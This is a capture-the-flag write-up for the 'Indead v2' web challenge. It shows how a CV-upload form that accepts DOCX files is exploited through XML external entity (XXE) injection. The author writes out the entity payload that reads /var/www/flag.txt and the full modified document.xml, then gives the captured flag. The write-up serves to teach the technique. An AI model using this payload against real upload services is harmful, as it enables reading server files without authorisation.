Indead v2
Category: web
50 points
Job posting website for security experts, pentesters and hackers. Now you can apply by uploading CV. http://indead-upload-cv.ctf2021.hackpack.club
Hint 1: flag.txt is located in /var/www/
Hint 2: We have new job postings. You might be interested
Solution
It’s a continuation of Indead v1.
This time there’s possibility to check details page and upload CV. The form allows only uploads of docx
type of file.
And then the content of the document is shown on the page.
I’ve decided to exploit it with XXE. Created dummy docx
file. And as it is ordinary zip
archive, I’ve extracted and
edited /word/document.xml
by adding below payload:
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/flag.txt" >]>
and &xxe;
in the body of xml
.
The malicious document.xml
looks like below after the change:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/flag.txt" >]>
<w:document xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/
2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/
2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/
wordprocessingDrawing" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://s
chemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibil
ity/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.mic
rosoft.com/office/word/2010/wordml" mc:Ignorable="w14 wp14"><w:body><w:p><w:pPr><w:pStyle w:val="Normal"/><w:bidi w:val=
"0"/><w:jc w:val="left"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr><w:t>Badum, tssss…. &xxe;</w:t></w:r></w:p><w:sectPr
><w:type w:val="nextPage"/><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:left="1134" w:right="1134" w:header="0" w:top="11
34" w:footer="0" w:bottom="1134" w:gutter="0"/><w:pgNumType w:fmt="decimal"/><w:formProt w:val="false"/><w:textDirection
w:val="lrTb"/></w:sectPr></w:body></w:document>
I swapped the original document.xml
with mine and attempted to upload the prepared docx
CV.
Flag
flag{XML_is_ancestor_0f_every7hing_do_you_agree_?}